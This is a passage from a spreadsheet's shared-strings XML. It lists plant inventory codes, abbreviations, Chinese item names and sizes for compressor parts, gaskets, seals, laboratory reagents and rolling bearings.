  <si>
    <t>2103</t>
  </si>
  <si>
    <t>07050482</t>
  </si>
  <si>
    <t>EJHSH2202</t>
  </si>
  <si>
    <t>二级活塞环</t>
  </si>
  <si>
    <t>2202</t>
  </si>
  <si>
    <t>07050483</t>
  </si>
  <si>
    <t>EJDXH2204</t>
  </si>
  <si>
    <t>二级导向环</t>
  </si>
  <si>
    <t>2204</t>
  </si>
  <si>
    <t>07050484</t>
  </si>
  <si>
    <t>FP1104</t>
  </si>
  <si>
    <t>1104</t>
  </si>
  <si>
    <t>07050485</t>
  </si>
  <si>
    <t>HS</t>
  </si>
  <si>
    <t>07050487</t>
  </si>
  <si>
    <t>FP1305</t>
  </si>
  <si>
    <t>1305</t>
  </si>
  <si>
    <t>07050488</t>
  </si>
  <si>
    <t>07050489</t>
  </si>
  <si>
    <t>07050490</t>
  </si>
  <si>
    <t>YJQF</t>
  </si>
  <si>
    <t>一级气阀</t>
  </si>
  <si>
    <t>07050491</t>
  </si>
  <si>
    <t>W</t>
  </si>
  <si>
    <t>瓦</t>
  </si>
  <si>
    <t>07050492</t>
  </si>
  <si>
    <t>XZQ</t>
  </si>
  <si>
    <t>限止器</t>
  </si>
  <si>
    <t>07050493</t>
  </si>
  <si>
    <t>LD175*166*1</t>
  </si>
  <si>
    <t>175*166*1</t>
  </si>
  <si>
    <t>07050494</t>
  </si>
  <si>
    <t>EJQF</t>
  </si>
  <si>
    <t>二级气阀</t>
  </si>
  <si>
    <t>07050495</t>
  </si>
  <si>
    <t>07050496</t>
  </si>
  <si>
    <t>07061403</t>
  </si>
  <si>
    <t>SMCRDDG25</t>
  </si>
  <si>
    <t>石墨缠绕垫</t>
  </si>
  <si>
    <t>DG25</t>
  </si>
  <si>
    <t>07061404</t>
  </si>
  <si>
    <t>SMCRDDG32</t>
  </si>
  <si>
    <t>DG32</t>
  </si>
  <si>
    <t>07061415</t>
  </si>
  <si>
    <t>SMCRDDG350</t>
  </si>
  <si>
    <t>DG350</t>
  </si>
  <si>
    <t>07061427</t>
  </si>
  <si>
    <t>F4CRDDG40</t>
  </si>
  <si>
    <t>F4缠绕垫</t>
  </si>
  <si>
    <t>07061433</t>
  </si>
  <si>
    <t>F4CRDDG150</t>
  </si>
  <si>
    <t>DG150</t>
  </si>
  <si>
    <t>07061434</t>
  </si>
  <si>
    <t>F4CRDDG200</t>
  </si>
  <si>
    <t>DG200</t>
  </si>
  <si>
    <t>07061438</t>
  </si>
  <si>
    <t>F4CRDDG400</t>
  </si>
  <si>
    <t>DG400</t>
  </si>
  <si>
    <t>07061439</t>
  </si>
  <si>
    <t>F4CRDDG500</t>
  </si>
  <si>
    <t>DG500</t>
  </si>
  <si>
    <t>07061445-1</t>
  </si>
  <si>
    <t>CRD</t>
  </si>
  <si>
    <t>1908*1858*1822*4.5</t>
  </si>
  <si>
    <t>07061445-2</t>
  </si>
  <si>
    <t>DG2000</t>
  </si>
  <si>
    <t>07061446</t>
  </si>
  <si>
    <t>SMFHD15</t>
  </si>
  <si>
    <t>石墨复合垫</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>07061459</t>
  </si>
  <si>
    <t>TXPG12*12</t>
  </si>
  <si>
    <t>碳纤盘根</t>
  </si>
  <si>
    <t>12*12</t>
  </si>
  <si>
    <t>07061463</t>
  </si>
  <si>
    <t>SFPG4*4</t>
  </si>
  <si>
    <t>四氟盘根</t>
  </si>
  <si>
    <t>4*4</t>
  </si>
  <si>
    <t>07061468</t>
  </si>
  <si>
    <t>SFD</t>
  </si>
  <si>
    <t>四氟垫</t>
  </si>
  <si>
    <t>07061468-1</t>
  </si>
  <si>
    <t>SFD656*672*2</t>
  </si>
  <si>
    <t>656*672*2</t>
  </si>
  <si>
    <t>07061469</t>
  </si>
  <si>
    <t>SFD18*8</t>
  </si>
  <si>
    <t>18*8</t>
  </si>
  <si>
    <t>07061471</t>
  </si>
  <si>
    <t>SFD155*145*2</t>
  </si>
  <si>
    <t>155*145*2</t>
  </si>
  <si>
    <t>07061472</t>
  </si>
  <si>
    <t>SFD150*140*2</t>
  </si>
  <si>
    <t>150*140*2</t>
  </si>
  <si>
    <t>07061473</t>
  </si>
  <si>
    <t>SFD130*115*5.5</t>
  </si>
  <si>
    <t>130*115*5.5</t>
  </si>
  <si>
    <t>07061474</t>
  </si>
  <si>
    <t>SFD165*145*10</t>
  </si>
  <si>
    <t>165*145*10</t>
  </si>
  <si>
    <t>07061475</t>
  </si>
  <si>
    <t>SFD40*28</t>
  </si>
  <si>
    <t>40*28</t>
  </si>
  <si>
    <t>07061477</t>
  </si>
  <si>
    <t>YLBD18*8</t>
  </si>
  <si>
    <t>压力表垫</t>
  </si>
  <si>
    <t>07061478</t>
  </si>
  <si>
    <t>145*135*2</t>
  </si>
  <si>
    <t>07061479</t>
  </si>
  <si>
    <t>07061480</t>
  </si>
  <si>
    <t>FJOXQ138*5.7</t>
  </si>
  <si>
    <t>氟胶O型圈</t>
  </si>
  <si>
    <t>138*5.7</t>
  </si>
  <si>
    <t>07061481</t>
  </si>
  <si>
    <t>FJOXQ</t>
  </si>
  <si>
    <t>115*5.7</t>
  </si>
  <si>
    <t>07061482</t>
  </si>
  <si>
    <t>OXQ155*5.7</t>
  </si>
  <si>
    <t>三元乙丙O型圈</t>
  </si>
  <si>
    <t>155*5.7</t>
  </si>
  <si>
    <t>07061483</t>
  </si>
  <si>
    <t>OXQ150*5.7</t>
  </si>
  <si>
    <t>150*5.7</t>
  </si>
  <si>
    <t>07061487</t>
  </si>
  <si>
    <t>LDJOXQ95*5.7</t>
  </si>
  <si>
    <t>氯丁胶O型圈</t>
  </si>
  <si>
    <t>95*5.7</t>
  </si>
  <si>
    <t>07061488</t>
  </si>
  <si>
    <t>LDJOXQ75*5.7</t>
  </si>
  <si>
    <t>75*5.7</t>
  </si>
  <si>
    <t>07061490</t>
  </si>
  <si>
    <t>XJQ</t>
  </si>
  <si>
    <t>橡胶圈</t>
  </si>
  <si>
    <t>50*3.1</t>
  </si>
  <si>
    <t>07061491</t>
  </si>
  <si>
    <t>20*3</t>
  </si>
  <si>
    <t>07061492</t>
  </si>
  <si>
    <t>YXXJQ</t>
  </si>
  <si>
    <t>异形橡胶圈</t>
  </si>
  <si>
    <t>140*113*35</t>
  </si>
  <si>
    <t>07061494</t>
  </si>
  <si>
    <t>LSQMFQ</t>
  </si>
  <si>
    <t>拉伸器密封圈</t>
  </si>
  <si>
    <t>07061496</t>
  </si>
  <si>
    <t>46*4.5</t>
  </si>
  <si>
    <t>07061500</t>
  </si>
  <si>
    <t>GJYF</t>
  </si>
  <si>
    <t>骨架油封</t>
  </si>
  <si>
    <t>07061501</t>
  </si>
  <si>
    <t>FJYF</t>
  </si>
  <si>
    <t>氟胶油封</t>
  </si>
  <si>
    <t>106*130*13</t>
  </si>
  <si>
    <t>07061505</t>
  </si>
  <si>
    <t>130*160*14</t>
  </si>
  <si>
    <t>07061506</t>
  </si>
  <si>
    <t>35*60*12</t>
  </si>
  <si>
    <t>07061507</t>
  </si>
  <si>
    <t>40*65*12</t>
  </si>
  <si>
    <t>07061510</t>
  </si>
  <si>
    <t>SMTLH1</t>
  </si>
  <si>
    <t>07061511</t>
  </si>
  <si>
    <t>SMTLH150*110*20</t>
  </si>
  <si>
    <t>150*110*20</t>
  </si>
  <si>
    <t>07061513</t>
  </si>
  <si>
    <t>SMTLH130*110*12</t>
  </si>
  <si>
    <t>130*110*12</t>
  </si>
  <si>
    <t>07070102</t>
  </si>
  <si>
    <t>LHA</t>
  </si>
  <si>
    <t>氯化铵</t>
  </si>
  <si>
    <t>07070103</t>
  </si>
  <si>
    <t>LHB</t>
  </si>
  <si>
    <t>氯化钡</t>
  </si>
  <si>
    <t>07070105</t>
  </si>
  <si>
    <t>LST</t>
  </si>
  <si>
    <t>硫酸铜</t>
  </si>
  <si>
    <t>过期的11瓶</t>
  </si>
  <si>
    <t>07070107</t>
  </si>
  <si>
    <t>QYHN</t>
  </si>
  <si>
    <t>氢氧化钠</t>
  </si>
  <si>
    <t>07070108</t>
  </si>
  <si>
    <t>WSTSN</t>
  </si>
  <si>
    <t>无水碳酸钠</t>
  </si>
  <si>
    <t>07070109</t>
  </si>
  <si>
    <t>QYHJ</t>
  </si>
  <si>
    <t>氢氧化钾</t>
  </si>
  <si>
    <t>07070110</t>
  </si>
  <si>
    <t>YSX</t>
  </si>
  <si>
    <t>乙酸锌</t>
  </si>
  <si>
    <t>07070112</t>
  </si>
  <si>
    <t>LHN</t>
  </si>
  <si>
    <t>氯化钠</t>
  </si>
  <si>
    <t>07070113</t>
  </si>
  <si>
    <t>YEASYSEN</t>
  </si>
  <si>
    <t>乙二铵四乙酸二钠</t>
  </si>
  <si>
    <t>07070114</t>
  </si>
  <si>
    <t>GMSJ</t>
  </si>
  <si>
    <t>高锰酸钾</t>
  </si>
  <si>
    <t>07070115</t>
  </si>
  <si>
    <t>KEFX</t>
  </si>
  <si>
    <t>卡尔费休</t>
  </si>
  <si>
    <t>07070116</t>
  </si>
  <si>
    <t>SL</t>
  </si>
  <si>
    <t>石蜡</t>
  </si>
  <si>
    <t>07070117</t>
  </si>
  <si>
    <t>BSC</t>
  </si>
  <si>
    <t>丙三醇</t>
  </si>
  <si>
    <t>07070119</t>
  </si>
  <si>
    <t>WSJC</t>
  </si>
  <si>
    <t>无水甲醇</t>
  </si>
  <si>
    <t>07070120</t>
  </si>
  <si>
    <t>SYCA</t>
  </si>
  <si>
    <t>三乙醇铵</t>
  </si>
  <si>
    <t>07070121</t>
  </si>
  <si>
    <t>WSYC</t>
  </si>
  <si>
    <t>无水乙醇</t>
  </si>
  <si>
    <t>07070122</t>
  </si>
  <si>
    <t>ZDC</t>
  </si>
  <si>
    <t>正丁醇</t>
  </si>
  <si>
    <t>07070123</t>
  </si>
  <si>
    <t>AS</t>
  </si>
  <si>
    <t>氨水</t>
  </si>
  <si>
    <t>07070124</t>
  </si>
  <si>
    <t>SYM</t>
  </si>
  <si>
    <t>石油醚</t>
  </si>
  <si>
    <t>07070125</t>
  </si>
  <si>
    <t>HJW</t>
  </si>
  <si>
    <t>环己烷</t>
  </si>
  <si>
    <t>07070126</t>
  </si>
  <si>
    <t>JQ</t>
  </si>
  <si>
    <t>甲醛</t>
  </si>
  <si>
    <t>07070127</t>
  </si>
  <si>
    <t>GYHQ</t>
  </si>
  <si>
    <t>过氧化氢</t>
  </si>
  <si>
    <t>07070128</t>
  </si>
  <si>
    <t>XS</t>
  </si>
  <si>
    <t>硝酸</t>
  </si>
  <si>
    <t>07070129</t>
  </si>
  <si>
    <t>BYS</t>
  </si>
  <si>
    <t>冰乙酸</t>
  </si>
  <si>
    <t>07070131</t>
  </si>
  <si>
    <t>GLSA</t>
  </si>
  <si>
    <t>过硫酸铵</t>
  </si>
  <si>
    <t>07070132</t>
  </si>
  <si>
    <t>LN</t>
  </si>
  <si>
    <t>硫脲</t>
  </si>
  <si>
    <t>07070133</t>
  </si>
  <si>
    <t>DHJ</t>
  </si>
  <si>
    <t>碘化钾</t>
  </si>
  <si>
    <t>07070136</t>
  </si>
  <si>
    <t>FSL</t>
  </si>
  <si>
    <t>凡士林</t>
  </si>
  <si>
    <t>07070137</t>
  </si>
  <si>
    <t>磷酸</t>
  </si>
  <si>
    <t>07070138</t>
  </si>
  <si>
    <t>YHX</t>
  </si>
  <si>
    <t>氧化锌</t>
  </si>
  <si>
    <t>07070139</t>
  </si>
  <si>
    <t>EYXYW</t>
  </si>
  <si>
    <t>二乙铣一肟</t>
  </si>
  <si>
    <t>07070140</t>
  </si>
  <si>
    <t>JXMSZS</t>
  </si>
  <si>
    <t>焦性莫食子酸</t>
  </si>
  <si>
    <t>07070141</t>
  </si>
  <si>
    <t>JJC</t>
  </si>
  <si>
    <t>甲基橙</t>
  </si>
  <si>
    <t>07070142</t>
  </si>
  <si>
    <t>JJH</t>
  </si>
  <si>
    <t>甲基红</t>
  </si>
  <si>
    <t>07070143</t>
  </si>
  <si>
    <t>XSY</t>
  </si>
  <si>
    <t>硝酸银</t>
  </si>
  <si>
    <t>07070146</t>
  </si>
  <si>
    <t>酚酞</t>
  </si>
  <si>
    <t>07070147</t>
  </si>
  <si>
    <t>LSG</t>
  </si>
  <si>
    <t>硫酸汞</t>
  </si>
  <si>
    <t>07070149</t>
  </si>
  <si>
    <t>TTSJ</t>
  </si>
  <si>
    <t>钛铁试剂</t>
  </si>
  <si>
    <t>07070150</t>
  </si>
  <si>
    <t>WSYSN</t>
  </si>
  <si>
    <t>无水乙酸钠</t>
  </si>
  <si>
    <t>07070151</t>
  </si>
  <si>
    <t>LFLL</t>
  </si>
  <si>
    <t>邻啡啰啉</t>
  </si>
  <si>
    <t>07070152</t>
  </si>
  <si>
    <t>YSQA</t>
  </si>
  <si>
    <t>盐酸羟铵</t>
  </si>
  <si>
    <t>07070154</t>
  </si>
  <si>
    <t>PS</t>
  </si>
  <si>
    <t>硼砂</t>
  </si>
  <si>
    <t>07070155</t>
  </si>
  <si>
    <t>淀粉</t>
  </si>
  <si>
    <t>07070162</t>
  </si>
  <si>
    <t>BYT</t>
  </si>
  <si>
    <t>苯乙酮</t>
  </si>
  <si>
    <t>07070163</t>
  </si>
  <si>
    <t>碘</t>
  </si>
  <si>
    <t>07070166</t>
  </si>
  <si>
    <t>DAJEJJBAYSY</t>
  </si>
  <si>
    <t>对氨基二甲基苯胺盐酸盐</t>
  </si>
  <si>
    <t>07070172</t>
  </si>
  <si>
    <t>MSA</t>
  </si>
  <si>
    <t>钼酸铵</t>
  </si>
  <si>
    <t>07070174</t>
  </si>
  <si>
    <t>SEWJBHSN</t>
  </si>
  <si>
    <t>十二烷基苯璜酸钠</t>
  </si>
  <si>
    <t>07070178</t>
  </si>
  <si>
    <t>XHJ</t>
  </si>
  <si>
    <t>溴化钾</t>
  </si>
  <si>
    <t>07070180</t>
  </si>
  <si>
    <t>GSG</t>
  </si>
  <si>
    <t>硅酸根</t>
  </si>
  <si>
    <t>07070185</t>
  </si>
  <si>
    <t>LBEJSQJ</t>
  </si>
  <si>
    <t>邻苯二甲酸氢钾</t>
  </si>
  <si>
    <t>07070196</t>
  </si>
  <si>
    <t>QSJ</t>
  </si>
  <si>
    <t>铅试剂</t>
  </si>
  <si>
    <t>07070198</t>
  </si>
  <si>
    <t>LSY</t>
  </si>
  <si>
    <t>硫酸银</t>
  </si>
  <si>
    <t>07070206</t>
  </si>
  <si>
    <t>ZSJ</t>
  </si>
  <si>
    <t>着色剂</t>
  </si>
  <si>
    <t>07070210</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>汞</t>
  </si>
  <si>
    <t>07070216</t>
  </si>
  <si>
    <t>碘化汞</t>
  </si>
  <si>
    <t>07080501</t>
  </si>
  <si>
    <t>ZC7617</t>
  </si>
  <si>
    <t>7617</t>
  </si>
  <si>
    <t>07080502</t>
  </si>
  <si>
    <t>ZC7616E</t>
  </si>
  <si>
    <t>7616E</t>
  </si>
  <si>
    <t>07080503</t>
  </si>
  <si>
    <t>ZC7517E</t>
  </si>
  <si>
    <t>7517E</t>
  </si>
  <si>
    <t>07080504</t>
  </si>
  <si>
    <t>ZC7516E</t>
  </si>
  <si>
    <t>7516E</t>
  </si>
  <si>
    <t>07080506</t>
  </si>
  <si>
    <t>ZC7116E</t>
  </si>
  <si>
    <t>7116E</t>
  </si>
  <si>
    <t>07080507</t>
  </si>
  <si>
    <t>ZC7215E</t>
  </si>
  <si>
    <t>7215E</t>
  </si>
  <si>
    <t>07080508</t>
  </si>
  <si>
    <t>ZC7212</t>
  </si>
  <si>
    <t>7212</t>
  </si>
  <si>
    <t>07080511</t>
  </si>
  <si>
    <t>ZC7613SC</t>
  </si>
  <si>
    <t>7613SC</t>
  </si>
  <si>
    <t>07080513</t>
  </si>
  <si>
    <t>ZC7607E</t>
  </si>
  <si>
    <t>7607E</t>
  </si>
  <si>
    <t>07080515</t>
  </si>
  <si>
    <t>ZC8312</t>
  </si>
  <si>
    <t>8312</t>
  </si>
  <si>
    <t>07080516</t>
  </si>
  <si>
    <t>ZC8409</t>
  </si>
  <si>
    <t>8409</t>
  </si>
  <si>
    <t>07080517</t>
  </si>
  <si>
    <t>ZC8211</t>
  </si>
  <si>
    <t>8211</t>
  </si>
  <si>
    <t>07080518</t>
  </si>
  <si>
    <t>ZC8210</t>
  </si>
  <si>
    <t>8210</t>
  </si>
  <si>
    <t>07080520</t>
  </si>
  <si>
    <t>ZC111</t>
  </si>
  <si>
    <t>111</t>
  </si>
  <si>
    <t>07080522</t>
  </si>
  <si>
    <t>ZC977907</t>
  </si>
  <si>
    <t>977907</t>
  </si>
  <si>
    <t>07080523</t>
  </si>
  <si>
    <t>ZC4074106</t>
  </si>
  <si>
    <t>4074106</t>
  </si>
  <si>
    <t>07080524</t>
  </si>
  <si>
    <t>ZC4074109</t>
  </si>
  <si>
    <t>4074109</t>
  </si>
  <si>
    <t>07080525</t>
  </si>
  <si>
    <t>ZC40784111</t>
  </si>
  <si>
    <t>40784111</t>
  </si>
  <si>
    <t>07080526</t>
  </si>
  <si>
    <t>ZC92606H</t>
  </si>
  <si>
    <t>92606H</t>
  </si>
  <si>
    <t>07080527</t>
  </si>
  <si>
    <t>ZC42208</t>
  </si>
  <si>
    <t>42208</t>
  </si>
  <si>
    <t>07080528</t>
  </si>
  <si>
    <t>ZC108</t>
  </si>
  <si>
    <t>108</t>
  </si>
  <si>
    <t>07080529</t>
  </si>
  <si>
    <t>ZC6006</t>
  </si>
  <si>
    <t>6006</t>
  </si>
  <si>
    <t>07080530</t>
  </si>
  <si>
    <t>ZC6010</t>
  </si>
  <si>
    <t>6010</t>
  </si>
  <si>
    <t>07080531</t>
  </si>
  <si>
    <t>ZC2007124</t>
  </si>
  <si>
    <t>2007124</t>
  </si>
  <si>
    <t>07080532</t>
  </si>
  <si>
    <t>ZC360111</t>
  </si>
  <si>
    <t>360111</t>
  </si>
  <si>
    <t>07080533</t>
  </si>
  <si>
    <t>ZC1609</t>
  </si>
  <si>
    <t>1609</t>
  </si>
  <si>
    <t>07080534</t>
  </si>
  <si>
    <t>ZC180515</t>
  </si>
  <si>
    <t>180515</t>
  </si>
  <si>
    <t>07080537</t>
  </si>
  <si>
    <t>ZC6410</t>
  </si>
  <si>
    <t>6410</t>
  </si>
  <si>
    <t>07080538</t>
  </si>
  <si>
    <t>ZC6407</t>
  </si>
  <si>
    <t>6407</t>
  </si>
  <si>
    <t>07080540</t>
  </si>
  <si>
    <t>ZC6404</t>
  </si>
  <si>
    <t>6404</t>
  </si>
  <si>
    <t>07080541</t>
  </si>
  <si>
    <t>ZC32610</t>
  </si>
  <si>
    <t>32610</t>
  </si>
  <si>
    <t>07080542</t>
  </si>
  <si>
    <t>ZC3612</t>
  </si>
  <si>
    <t>3612</t>
  </si>
  <si>
    <t>07080543</t>
  </si>
  <si>
    <t>ZC3614</t>
  </si>
  <si>
    <t>3614</t>
  </si>
  <si>
    <t>07080544</t>
  </si>
  <si>
    <t>ZC32614</t>
  </si>
  <si>
    <t>32614</t>
  </si>
  <si>
    <t>07080545</t>
  </si>
  <si>
    <t>ZC32616</t>
  </si>
  <si>
    <t>32616</t>
  </si>
  <si>
    <t>07080547</t>
  </si>
  <si>
    <t>ZC32022</t>
  </si>
  <si>
    <t>32022</t>
  </si>
  <si>
    <t>07080548</t>
  </si>
  <si>
    <t>ZC2312E</t>
  </si>
  <si>
    <t>2312E</t>
  </si>
  <si>
    <t>07080550</t>
  </si>
  <si>
    <t>ZC30313</t>
  </si>
  <si>
    <t>30313</t>
  </si>
  <si>
    <t>07080551-3</t>
  </si>
  <si>
    <t>ZC</t>
  </si>
  <si>
    <t>3313</t>
  </si>
  <si>
    <t>07080551-4</t>
  </si>
  <si>
    <t>ZC5313</t>
  </si>
  <si>
    <t>5313</t>
  </si>
  <si>
    <t>07080554</t>
  </si>
  <si>
    <t>ZCNU214</t>
  </si>
  <si>
    <t>NU214</t>
  </si>
  <si>
    <t>07080555</t>
  </si>
  <si>
    <t>ZC32216</t>
  </si>
  <si>
    <t>32216</t>
  </si>
  <si>
    <t>07080556</t>
  </si>
  <si>
    <t>ZC62216</t>
  </si>
  <si>
    <t>62216</t>
  </si>
  <si>
    <t>07080557</t>
  </si>
  <si>
    <t>ZC6216</t>
  </si>
  <si>
    <t>6216</t>
  </si>
  <si>
    <t>07080558</t>
  </si>
  <si>
    <t>ZC6215</t>
  </si>
  <si>
    <t>6215</t>
  </si>
  <si>
    <t>07080559-2</t>
  </si>
  <si>
    <t>ZCNU218</t>
  </si>
  <si>
    <t>NU218C3</t>
  </si>
  <si>
    <t>07080560</t>
  </si>
  <si>
    <t>ZC219</t>
  </si>
  <si>
    <t>219</t>
  </si>
  <si>
    <t>07080561</t>
  </si>
  <si>
    <t>ZCN319M</t>
  </si>
  <si>
    <t>N319M</t>
  </si>
  <si>
    <t>07080562</t>
  </si>
  <si>
    <t>ZC6319</t>
  </si>
  <si>
    <t>6319</t>
  </si>
  <si>
    <t>07080563-1</t>
  </si>
  <si>
    <t>6318C3</t>
  </si>
  <si>
    <t>07080564</t>
  </si>
  <si>
    <t>ZC7317E</t>
  </si>
  <si>
    <t>7317E</t>
  </si>
  <si>
    <t>07080565</t>
  </si>
  <si>
    <t>ZC32317</t>
  </si>
  <si>
    <t>32317</t>
  </si>
  <si>
    <t>07080567</t>
  </si>
  <si>
    <t>ZCN317EM</t>
  </si>
  <si>
    <t>N317EM</t>
  </si>
  <si>
    <t>07080568</t>
  </si>
  <si>
    <t>ZC22317</t>
  </si>
  <si>
    <t>22317</t>
  </si>
  <si>
    <t>07080569</t>
  </si>
  <si>
    <t>ZCN316</t>
  </si>
  <si>
    <t>N316</t>
  </si>
  <si>
    <t>07080569-1</t>
  </si>
  <si>
    <t>ZC32316</t>
  </si>
  <si>
    <t>32316</t>
  </si>
  <si>
    <t>07080570</t>
  </si>
  <si>
    <t>ZC1316</t>
  </si>
  <si>
    <t>1316</t>
  </si>
  <si>
    <t>07080571</t>
  </si>
  <si>
    <t>ZC6316</t>
  </si>
  <si>
    <t>6316</t>
  </si>
  <si>
    <t>07080571-1</t>
  </si>
  <si>
    <t>JKZC6316</t>
  </si>
  <si>
    <t>进口轴承</t>
  </si>
  <si>
    <t>07080576</t>
  </si>
  <si>
    <t>ZC1315</t>
  </si>
  <si>
    <t>1315</t>
  </si>
  <si>
    <t>07080578</t>
  </si>
  <si>
    <t>ZC314EM</t>
  </si>
  <si>
    <t>314EM</t>
  </si>
  <si>
    <t>07080581</t>
  </si>
  <si>
    <t>ZC221</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <t>07080582</t>
  </si>
  <si>
    <t>ZC224K</t>
  </si>
  <si>
    <t>224K</t>
  </si>
  <si>
    <t>07080583</t>
  </si>
  <si>
    <t>ZC6320</t>
  </si>
  <si>
    <t>6320</t>
  </si>
  <si>
    <t>07080584</t>
  </si>
  <si>
    <t>ZCN320EM</t>
  </si>
  <si>
    <t>N320EM</t>
  </si>
  <si>
    <t>07080585</t>
  </si>
  <si>
    <t>ZC6322</t>
  </si>
  <si>
    <t>6322</t>
  </si>
  <si>
    <t>07080585-1</t>
  </si>
  <si>
    <t>JKZC6322</t>
  </si>
  <si>
    <t>07080587</t>
  </si>
  <si>
    <t>ZC3622</t>
  </si>
  <si>
    <t>3622</t>
  </si>
  <si>
    <t>07080588-3</t>
  </si>
  <si>
    <t>JKZCNU224</t>
  </si>
  <si>
    <t>NU224</t>
  </si>
  <si>
    <t>07080590</t>
  </si>
  <si>
    <t>ZC1616</t>
  </si>
  <si>
    <t>1616</t>
  </si>
  <si>
    <t>07080591</t>
  </si>
  <si>
    <t>ZC6222</t>
  </si>
  <si>
    <t>6222</t>
  </si>
  <si>
    <t>07080593</t>
  </si>
  <si>
    <t>ZCNU2222EM</t>
  </si>
  <si>
    <t>NU2222EM</t>
  </si>
  <si>
    <t>07080594-1</t>
  </si>
  <si>
    <t>JKZC6324</t>
  </si>
  <si>
    <t>6324</t>
  </si>
  <si>
    <t>07080595</t>
  </si>
  <si>
    <t>ZC32324</t>
  </si>
  <si>
    <t>32324</t>
  </si>
  <si>
    <t>07080596</t>
  </si>
  <si>
    <t>ZC2326</t>
  </si>
  <si>
    <t>2326</t>
  </si>
  <si>
    <t>07080599</t>
  </si>
  <si>
    <t>ZC7624</t>
  </si>
  <si>
    <t>7624</t>
  </si>
  <si>
    <t>07080599-1</t>
  </si>
  <si>
    <t>ZC32224</t>
  </si>
  <si>
    <t>32224</t>
  </si>
  <si>
    <t>07080607-5</t>
  </si>
  <si>
    <t>ZCNU205</t>
  </si>
  <si>
    <t>NU205</t>
  </si>
  <si>
    <t>07080608</t>
  </si>
  <si>
    <t>ZC6206</t>
  </si>
  <si>
    <t>6206</t>
  </si>
  <si>
    <t>07080608-3</t>
  </si>
  <si>
    <t>ZC3206</t>
  </si>
  <si>
    <t>3206</t>
  </si>
  <si>
    <t>07080610-1</t>
  </si>
  <si>
    <t>ZC7207</t>
  </si>
  <si>
    <t>7207</t>
  </si>
  <si>
    <t>07080612</t>
  </si>
  <si>
    <t>ZC6208</t>
  </si>
  <si>
    <t>6208</t>
  </si>
  <si>
    <t>07080614</t>
  </si>
  <si>
    <t>ZC6209</t>
  </si>
  <si>
    <t>6209</t>
  </si>
  <si>
    <t>07080614-2</t>
  </si>
  <si>
    <t>ZC7209BDB</t>
  </si>
  <si>
    <t>7209BDB</t>
  </si>
  <si>
    <t>07080617</t>
  </si>
  <si>
    <t>JKZC6210</t>
  </si>
  <si>
    <t>6210</t>
  </si>
  <si>
    <t>07080617-1</t>
  </si>
  <si>
    <t>ZC6210</t>
  </si>
  <si>
    <t>07080617-3</t>
  </si>
  <si>
    <t>ZCN210</t>
  </si>
  <si>
    <t>N210</t>
  </si>
  <si>
    <t>07080617-4</t>
  </si>
  <si>
    <t>ZC7210</t>
  </si>
  <si>
    <t>7210</t>
  </si>
  <si>
    <t>07080618</t>
  </si>
  <si>
    <t>ZC6211</t>
  </si>
  <si>
    <t>6211</t>
  </si>
  <si>
    <t>07080618-1</t>
  </si>
  <si>
    <t>ZC32211</t>
  </si>
  <si>
    <t>32211</t>
  </si>
  <si>
    <t>07080619</t>
  </si>
  <si>
    <t>ZC6212</t>
  </si>
  <si>
    <t>6212</t>
  </si>
  <si>
    <t>07080620</t>
  </si>
  <si>
    <t>ZC5212</t>
  </si>
  <si>
    <t>5212</t>
  </si>
  <si>
    <t>07080621</t>
  </si>
  <si>
    <t>ZC3212</t>
  </si>
  <si>
    <t>3212</t>
  </si>
  <si>
    <t>07080622</t>
  </si>
  <si>
    <t>ZC30212</t>
  </si>
  <si>
    <t>30212</t>
  </si>
  <si>
    <t>07080623</t>
  </si>
  <si>
    <t>ZC6213</t>
  </si>
  <si>
    <t>6213</t>
  </si>
  <si>
    <t>07080623-1</t>
  </si>
  <si>
    <t>JKZC6213</t>
  </si>
  <si>
    <t>07080626</t>
  </si>
  <si>
    <t>ZC6303</t>
  </si>
  <si>
    <t>6303</t>
  </si>
  <si>
    <t>07080628</t>
  </si>
  <si>
    <t>ZC6305</t>
  </si>
  <si>
    <t>6305</t>
  </si>
  <si>
    <t>07080629</t>
  </si>
  <si>
    <t>ZC6306</t>
  </si>
  <si>
    <t>6306</t>
  </si>
  <si>
    <t>07080629-1</t>
  </si>
  <si>
    <t>ZCNU2306</t>
  </si>
  <si>
    <t>NU2306</t>
  </si>
  <si>
    <t>07080632</t>
  </si>
  <si>
    <t>NU307ME</t>
  </si>
  <si>
    <t>07080636</t>
  </si>
  <si>
    <t>ZCNU2308</t>
  </si>
  <si>
    <t>NU2308</t>
  </si>
  <si>
    <t>07080641-2</t>
  </si>
  <si>
    <t>JKZCNU309</t>
  </si>
  <si>
    <t>NU309</t>
  </si>
  <si>
    <t>07080642</t>
  </si>
  <si>
    <t>ZC5310</t>
  </si>
  <si>
    <t>5310</t>
  </si>
  <si>
    <t>07080643</t>
  </si>
  <si>
    <t>ZCN310</t>
  </si>
  <si>
    <t>N310</t>
  </si>
  <si>
    <t>07080644</t>
  </si>
  <si>
    <t>ZC7310BDB</t>
  </si>
  <si>
    <t>7310BDB</t>
  </si>
  <si>
    <t>07080647</t>
  </si>
  <si>
    <t>ZC6311</t>
  </si>
  <si>
    <t>6311</t>
  </si>
  <si>
    <t>07080648</t>
  </si>
  <si>
    <t>ZC22311</t>
  </si>
  <si>
    <t>22311</t>
  </si>
  <si>
    <t>07080648-1</t>
  </si>
  <si>
    <t>ZC31311</t>
  </si>
  <si>
    <t>31311</t>
  </si>
  <si>
    <t>07080648-2</t>
  </si>
  <si>
    <t>ZC7311BD</t>
  </si>
  <si>
    <t>7311BD</t>
  </si>
  <si>
    <t>07080650-2</t>
  </si>
  <si>
    <t>7312</t>
  </si>
  <si>
    <t>07080650-3</t>
  </si>
  <si>
    <t>JKZC6312</t>
  </si>
  <si>
    <t>6312</t>
  </si>
  <si>
    <t>07080653</t>
  </si>
  <si>
    <t>ZC42232</t>
  </si>
  <si>
    <t>42232</t>
  </si>
  <si>
    <t>07080654</t>
  </si>
  <si>
    <t>ZC326K</t>
  </si>
  <si>
    <t>326K</t>
  </si>
  <si>
    <t>07080655</t>
  </si>
  <si>
    <t>ZC22228</t>
  </si>
  <si>
    <t>22228</t>
  </si>
  <si>
    <t>07080659</t>
  </si>
  <si>
    <t>8207</t>
  </si>
  <si>
    <t>07080661</t>
  </si>
  <si>
    <t>ZCGE50ES</t>
  </si>
  <si>
    <t>GE50ES</t>
  </si>
  <si>
    <t>07080662</t>
  </si>
  <si>
    <t>ZCGE40ES</t>
  </si>
  <si>
    <t>GE40ES</t>
  </si>
  <si>
    <t>07080665-1</t>
